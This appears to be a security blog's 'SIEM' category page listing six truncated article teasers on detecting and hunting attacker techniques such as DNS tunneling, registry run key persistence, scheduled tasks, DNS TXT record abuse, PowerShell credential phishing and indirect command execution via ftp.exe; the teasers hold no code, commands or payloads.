Category: SIEM
-
Detecting DNS Tunneling
Intro DNS Tunneling represents a threat often operating under the radar of traditional defense measures. By leveraging a fundamental protocol of the internet, Domain Name System (DNS), this technique allows threat actors to exfiltrate data or establish command and control (C2) channels, often leaving IT security teams none the wiser. What is DNS Tunneling? DNS […]
-
Registry Run Keys: Maintaining Persistence
Intro Want to start Outlook on login? Easy. Start malware on login…even in safe mode? Just as easy. Registry run keys in Windows help start programs, scripts, or commands when your computer boots up or when you log in. They make managing apps and services easier when it comes to IT management or enhancing the […]
-
Scheduled Tasks: Collecting Evidence
Intro Scheduled tasks are a valuable feature in Windows that enables users to schedule specific actions on their systems at desired times. This feature allows users to start designated programs at login, reboot their computers on a set schedule, and execute custom commands or scripts. However, this feature can also be exploited by adversaries to […]
-
Abusing DNS: Hiding Commands in TXT Records
Intro While TXT DNS (text domain name system) records have legitimate purposes, it is important to be aware that adversaries can exploit TXT records to hide content and commands. Adversaries may use DNS to establish communication with systems that are under their control within a victim network, all while appearing as normal, expected traffic. What […]
-
PowerShell Phishing: How Adversaries Use the Command Line to Steal Your Credentials
Intro In addition to the well-known email-based phishing attacks where attackers impersonate legitimate websites to deceive users into revealing their login credentials, attackers can employ other methods to trick users into giving away their sensitive information. It is possible to deceive users on an internal network to engage them with a prompt that will coerce […]
-
Hunting Indirect Command Execution Using FTP
Intro Ftp.exe can be used for starting arbitrary processes and commands. Indirect Command Execution is a technique used by adversaries to execute arbitrary commands through a trusted system or application. Adversaries use this technique to evade security controls and conceal their actions, making it difficult for defenders to detect and prevent malicious activity. Did you […]